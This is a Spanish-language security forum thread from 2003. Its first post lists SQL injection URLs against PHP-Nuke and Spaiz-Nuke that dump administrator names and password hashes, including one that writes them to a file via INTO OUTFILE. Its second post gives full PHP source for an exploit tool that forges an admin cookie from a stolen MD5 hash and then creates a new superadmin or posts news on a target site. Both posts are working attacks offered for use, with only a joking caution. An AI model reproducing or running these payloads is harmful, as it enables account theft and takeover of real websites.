|
Mostrar Mensajes
|
Páginas: [1]
|
2
|
Seguridad Informática / Nivel Web / Aclaraciones:
|
en: 30 Octubre 2003, 15:35 pm
|
Aclaremos:
/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke... Que despues se visualiza en: /path_to_file/pwd.txt...
Para el PHP-Nuke y el Modulo WebLinks:
Para que muestre todos los administradores: /modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20
Y para que muestre los Password Codificados de los administradores: /modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20
Y sobre el PHP-Nuke y el modulo Downloads:
Con esto muestra los administradores y sus passwords codificados...: /modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20....
Todo codigo que ejecuta la Inyeccion SQL puede ser modificado levemente para conseguir el objetivo deseado... El exploit facilita el proceso, evitando que el usuario tenga que completar varias partes del proceso completo...
Salu2...
PD: Usar con moderacion y todo eso...
|
|
|
3
|
Seguridad Informática / Nivel Web / Nueva Version Exploit PHP-Nuke...
|
en: 16 Octubre 2003, 19:50 pm
|
Buenas , gracias, queria publicaros la ultima version del exploit(v2.2), facilita otro apartado de la administracion, que permite agregar noticias... Ya no habrán mas por el tiempo etc... Aqui va el codigo: file: exploit.php <?php /* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 By BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee BBB lll aad de BBB lll aaaaaaaaaad dde eeeeeeeeee BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee BBBBBBBBBB lll aaa aaa ddd dddeeee BBB BBB lll aaa aaa ddd ddd eee BBB BBBB lll aaa aaa ddd ddd eee BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee BBBBBBBB lllll aa dddddddddd eeeeeee <blade@abez.org>
|Blade «blade@abez.org»| ****www.abez.org Of AbeZ ***www.rzw.com.ar By XyborG **www.adictosnet.com.ar By LaKosa *www.fihezine.tsx.to Of FiH eZine */ echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head> <title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By Blade</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css> .bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif } A:link { COLOR: #000066; TEXT-DECORATION: none } A:visited { COLOR: #000066; TEXT-DECORATION: none } A:active { COLOR: #000066; TEXT-DECORATION: none } A:hover { COLOR: #000066; TEXT-DECORATION: none } .button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif } </STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636" vlink="#363636" alink="#d5ae83"> <!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code By Blade<blade@abez.org> -->';
if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email) and ($add_aid) and ($add_pwd)){ $admin_name = chop($admin_name); $admin_hash = chop($admin_hash); $server = chop($server); $add_pwd = chop($add_pwd); $hash = $admin_name . ":" . $admin_hash . ":"; $hash = base64_encode($hash); echo "<form name='add' method='post' action='http://" . $server . "/admin.php'> <input type='hidden' name='op' value='AddAuthor'> <input type='hidden' name='add_name' value='" . $add_name . "'> <input type='hidden' name='add_aid' value='" . $add_aid . "'> <input type='hidden' name='add_email' value='" . $add_email . "'> <input type='hidden' name='add_url' value='" . $add_url . "'> <input type='hidden' name='add_pwd' value='" . $add_pwd . "'> <input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'> <input type='hidden' name='admin' value=" . $hash ."> <center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" . $hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name . "</strong>. En caso de que estos datos no sean correctos vuelva atras desde <a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos continue la operacion agregando el nuevo Administrador.</b></font></center> <center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center> </form>"; } elseif (($action == "goNews") and ($server) and ($subject) and ($hometext) and ($bodytext)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash); $server = chop($server); $add_pwd = chop($add_pwd); $hash = $admin_name . ":" . $admin_hash . ":"; $hash = base64_encode($hash); echo "<form name='addNews' method='post' action='http://" . $server . "/admin.php'> <input name='op' type='hidden' id='op' value='PostAdminStory'> <input name='topic' type='hidden' id='topic' value='1'> <input name='catid' type='hidden' id='catid' value='0'> <input name='ihome' type='hidden' id='ihome' value='0'> <input type='hidden' name='subject' value='" . $subject . "'> <input type='hidden' name='hometext' value='" . $hometext . "'> <input type='hidden' name='bodytext' value='" . $bodytext . "'> <input type='hidden' name='acomm' value='" . $acomm . "'> <input type='hidden' name='automated' value='" . $automated . "'> <input type='hidden' name='day' value='" . $day . "'> <input type='hidden' name='month' value='" . $month . "'> <input type='hidden' name='year' value='" . $year . "'> <input type='hidden' name='hour' value='" . $hour . "'> <input type='hidden' name='min' value='" . $min . "'> <input type='hidden' name='admin' value=" . $hash ."> <center> <font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor vulnerable : <strong>http://" . $server . "</strong> . <br> Clave Hash : <strong>" . $hash . "</strong> . <br> Asunto de la Noticia: <strong>" . $subject . "</strong>. <br> La Noticia es: <strong>" . $hometext . "</strong>. <br> En caso de que estos datos no sean correctos vuelva atras desde <a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br> <br> <font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos continue la operacion agregando la noticia.</b></font> </center> <center> <input name='AddSysop' type='submit' id='AddSysop' value='Agregar Noticia' class='button'> </center> </form>"; } elseif($exploit == "news") { echo'<FORM action="' . $PHP_Self . '" method=post> <TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0> <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor Vulnerable:</u></font></strong></div></TD> </TR> <TR> <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion Servidor:</strong></font></div></TD> <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD> <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> </font> <input name="server" type="text" class="bginput" id="server" value="www."> </div></TD> </TR> <TR> <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre Admin :</font></strong></div></TD> <TD> </TD> <TD> <p align="left"> <input name="admin_name" type="text" id="admin_name" class="bginput"> </p></TD> </TR> <TR> <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD> <TD> </TD> <TD> <p align="left"> <input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput"> </p></TD> </TR> </TABLE><br> <table width="50%" border="0" align="center"> <tr> <td><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Noticia:</u></font></strong></div></td> </tr> <tr> <td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <input name="action" type="hidden" id="action" value="goNews"> Título</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">(Obligatorio)<strong>:<br> <input size=50 name=subject class="bginput"> </strong></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto de la Noticia</strong>(Obligatorio)<strong>:<br> <textarea name=hometext rows=5 wrap=virtual cols=50 class="bginput"></textarea> </strong></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto Extendido</strong>(Obligatorio)<strong>:<br> <textarea name=bodytext rows=12 wrap=virtual cols=50 class="bginput"></textarea> </strong></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Activar Comentarios para esta Noticia?<strong> <input type=radio checked value=0 name=acomm> Si <input type=radio value=1 name=acomm> No</strong><strong></strong></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Quieres programar esta historia?<strong> <input type=radio value=1 name=automated> Si <input type=radio checked value=0 name=automated> No<br> <br> Día: <input name="day" type="text" id="day3" value="' . date(d) . '" size="4" class="bginput"> Mes: <select name="month" id="select2" class="bginput"> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> <option value="6">6</option> <option value="7">7</option> <option value="8">8</option> <option value="9">9</option> <option value="10">10</option> <option value="11">11</option> <option value="12" selected>12</option> </select> Año: <input maxlength=4 size=5 value="' . date(Y) . '" name=year class="bginput"> <br> Hora: <select name=hour class="bginput"> <option selected name="hour">00</option> <option name="hour">01</option> <option name="hour">02</option> <option name="hour">03</option> <option name="hour">04</option> <option name="hour">05</option> <option name="hour">06</option> <option name="hour">07</option> <option name="hour">08</option> <option name="hour">09</option> <option name="hour">10</option> <option name="hour">11</option> <option name="hour">12</option> <option name="hour">13</option> <option name="hour">14</option> <option name="hour">15</option> <option name="hour">16</option> <option name="hour">17</option> <option name="hour">18</option> <option name="hour">19</option> <option name="hour">20</option> <option name="hour">21</option> <option name="hour">22</option> <option name="hour">23</option> </select> : <select name=min class="bginput"> <option selected name="min">00</option> <option name="min">05</option> <option name="min">10</option> <option name="min">15</option> <option name="min">20</option> <option name="min">25</option> <option name="min">30</option> <option name="min">35</option> <option name="min">40</option> <option name="min">45</option> <option name="min">50</option> <option name="min">55</option> </select> : 00</strong></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Agregar Noticia" class="button"> </strong></font></div></td> </tr> </table><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ Ver el exploit de los Administradores ]</a> </font></strong></center>'; } else { echo'<FORM action="' . $PHP_Self . '" method=post> <p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <input name="action" type="hidden" id="action" value="goAdmin"> </font></strong></u></p> <div align="center"> <TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0> <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor Vulnerable:</u></font></strong></div></TD> </TR> <TR> <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion Servidor:</strong></font></div></TD> <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD> <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> </font> <input name="server" type="text" class="bginput" id="server" value="www."> </div></TD> </TR> <TR> <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre Admin :</font></strong></div></TD> <TD> </TD> <TD> <p align="left"> <input name="admin_name" type="text" id="admin_name" class="bginput"> </p></TD> </TR> <TR> <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD> <TD> </TD> <TD> <p align="left"> <input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput"> </p></TD> </TR> </TABLE> <br> </div> <TABLE width="50%" border=0 align="center"> <TBODY> <TR> <TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Datos de la Cuenta:</u></font></strong></div></TD> </TR> <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nombre:</strong></font></TD> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <INPUT maxLength=50 size=30 name=add_name class="bginput"> (Obligatorio)</font></TD> </TR> <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nickname:</strong></font></TD> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <INPUT maxLength=30 size=30 name=add_aid class="bginput"> (Obligatorio)</font></TD> </TR> <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>E-Mail:</strong></font></TD> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <INPUT maxLength=60 size=30 name=add_email class="bginput"> (Obligatorio)</font></TD> </TR> <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60> <strong> <input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1"> </strong> </font></TD> </TR> <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Password:</strong></font></TD> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput"> (Obligatorio)</font></TD> </TR> <INPUT type=hidden value=AddAuthor name=op> </TABLE> <div align="center"> <INPUT name="submit" type=submit value="Crear Administrador" class="button"> </div> </FORM><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ Ver el exploit de la Noticias ]</a> </font></strong></center>'; } if (($action == "goAdmin") or ($action == "goNews")){ echo'';
}if (($action != "goAdmin") and ($action != "goNews")){ echo'<br><table width="100%" border="0" align="center"> <tr> <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Uso:</u></strong></font></div></td> </tr> <tr> <td width="15%"><strong><font size="1" face="Tahoma">»Direccion Servidor :</font></strong></td> <td width="85%"><font size="1" face="Tahoma">Es la URL correspondiente al Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td> </tr> <tr> <td><strong><font size="1" face="Tahoma">»Nombre Admin :</font></strong></td> <td><font size="1" face="Tahoma">Es la identidad en valor de nombre, del administrador del cual se conoce el password cifrado. Ejemplo : xMan.</font></td> </tr> <tr> <td><strong><font size="1" face="Tahoma">»Password MD5 :</font></strong></td> <td><font size="1" face="Tahoma">Es el password cifrado en MD5 del administrador, cuyo nombre se conoce. Ejemplo: 1ea52f26e7e0ce08e462f87f5e35096c </font></td> </tr> </table><br><div align="center"> <table width="45%" border="0" align="center"> <tr> <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Referencias:</u></strong></font></div></td> </tr> <tr> <td width="47%"><div align="center"><font size="1" face="Tahoma">Descubridores Bug :</font></div></td> <td width="53%"><div align="center"><font size="1" face="Tahoma"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://www.rst.void.ru</a> </font> <font size="1" face="Tahoma"></font></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Tahoma"><strong>Mas Informacion</strong> :</font></div></td> <td><div align="center"><strong><font size="1" face="Tahoma"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td> </tr> <tr> <td><div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td> <td><div align="center"><font size="1" face="Tahoma"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td> </tr> <tr> <td> <div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td> <td><div align="center"><font size="1" face="Tahoma"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td> </tr> </table>';
} echo'<center><p><a href="mailto:blade@abez.org"><u><strong><font color="#CC0000" size="1" face="Tahoma">Original Exploit Code By Blade.</font></strong></u></a><br><font color="#003366" size="1" face="Verdana"><b>Version 2.2.</b></font></p></center> </div> </body> </html>'; ?> Venga un saludo
|
|
|
|
|
|
|